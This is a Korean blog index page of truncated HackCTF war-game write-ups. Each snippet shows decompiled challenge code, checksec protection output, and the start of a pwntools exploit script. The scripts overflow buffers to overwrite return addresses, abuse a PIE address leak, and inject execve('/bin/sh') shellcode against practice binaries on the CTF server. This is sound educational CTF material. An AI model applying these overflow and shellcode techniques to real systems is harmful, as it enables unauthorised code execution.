![[hackctf] RTL_World 포스팅 썸네일 이미지](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcJaZQR%2Fbtq2NEBdXpk%2FzbQZPMdrl7vLrdH1wJNNw1%2Fimg.png)
War Games/hack-ctf
[hackctf] RTL_World
문제 소스 int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax int v4; // [esp+0h] [ebp-A0h] int v5; // [esp+10h] [ebp-90h] char buf; // [esp+14h] [ebp-8Ch] void *v7; // [esp+94h] [ebp-Ch] void *handle; // [esp+98h] [ebp-8h] void *s1; // [esp+9Ch] [ebp-4h] setvbuf(stdout, 0, 2, 0); handle = dlopen("/lib/i386-linux-gnu/libc.so.6", 1); v7 = dlsym(handle, "system"); dlc..
![[hackctf] Yes or no 포스팅 썸네일 이미지](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbXklUW%2Fbtq2NrhNSwK%2F4gjHJziDd1fYXwfZZsZOck%2Fimg.png)
War Games/hack-ctf
[hackctf] Yes or no
문제 소스 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax int v4; // eax int v5; // ecx int v6; // eax int v7; // eax char s; // [rsp+Eh] [rbp-12h] int v10; // [rsp+18h] [rbp-8h] int v11; // [rsp+1Ch] [rbp-4h] setvbuf(stdout, 0LL, 2, 0LL); v11 = 5; puts("Show me your number~!"); fgets(&s, 10, stdin); v10 = atoi(&s); if ( (v11 - 10) >> 3 < 0 ) { v4 = 0; } else { v3 =..
![[hackctf] BOF_PIE 포스팅 썸네일 이미지](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbog9zl%2Fbtq2NqJYvvp%2FZtAWNTAbFBlz1b6VEtaQZk%2Fimg.png)
War Games/hack-ctf
[hackctf] BOF_PIE
문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : Partial 문제 분석 및 페이로드 welcome함수가 맵핑되는 주소가 leak되니 welcome함수로부터 "종현"함수까지의 거리를 알아내고 ret을 변조시키면 된다. from pwn import * dns,port="ctf.j0n9hyun.xyz", 3008 p=remote(dns,port) # #p=process("./bof_pie") e=ELF("./bof_pie") p.recvuntil("is ") addr=p.recvline()[:-1] print addr pay="A"*22 pay+=p32(int(addr,16)..
![[hackctf] offset 포스팅 썸네일 이미지](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FctxGWV%2Fbtq2NpYAn64%2F3fAMxSZbjJyGBhfnYs8hH0%2Fimg.png)
War Games/hack-ctf
[hackctf] offset
문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : FULL 문제 분석 및 페이로드 1. gets함수가 있으나 pie보호 기법이 걸려 ret over write를 해도 print_flag함수 호출 불가능 2. two함수와 print_flag주소가 인접함을 눈치챔 3. select_func함수에서 결론적으로 v3()를 호출하는데 dest변수에 strncpy를 해주기 때문에 v3변수의 하위 1바이트 변조가능 from pwn import * context.log_level='debug' #p=process('./offset') dns,port="ctf.j0n9hyun.xyz",30..
![[hackctf] Simple_Overflow_ver_2 포스팅 썸네일 이미지](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FoeND9%2Fbtq2OpqhDjn%2F7I6YSx5MFoGlmUCks3cVAk%2Fimg.png)
War Games/hack-ctf
[hackctf] Simple_Overflow_ver_2
문제 소스 ctf.j0n9hyun.xyz/challenges#Simple_Overflow_ver_2 HackCTF Do you wanna be a God? If so, Challenge! ctf.j0n9hyun.xyz 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : Partial 문제 분석 및 페이로드 from pwn import * context.arch='x86' #context.log_level='debug' p=process("./Simple_overflow_ver_2") p.sendlineafter("Data : ","hihi") addr=p.recvuntil(":")[..
![[hackctf] x64 Simple_size_BOF 포스팅 썸네일 이미지](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbGVO6n%2Fbtq2N0YhYJV%2FOmc9lOfkNVvNjsB7ffV0MK%2Fimg.png)
War Games/hack-ctf
[hackctf] x64 Simple_size_BOF
문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : Partial 문제 분석 및 페이로드 from pwn import * context.arch='x86_64' p=process("./Simple_size_bof") p.recvuntil("buf: ") addr=p.recvline()[:-1] shell=asm(shellcraft.execve("/bin/sh",0,0)) print len(shell) pay=shell pay+="A"*(0x6d30-37) pay+='B'*0x8 pay+=p64(int(addr,16)) p.sendline(pay) p.interactive(..
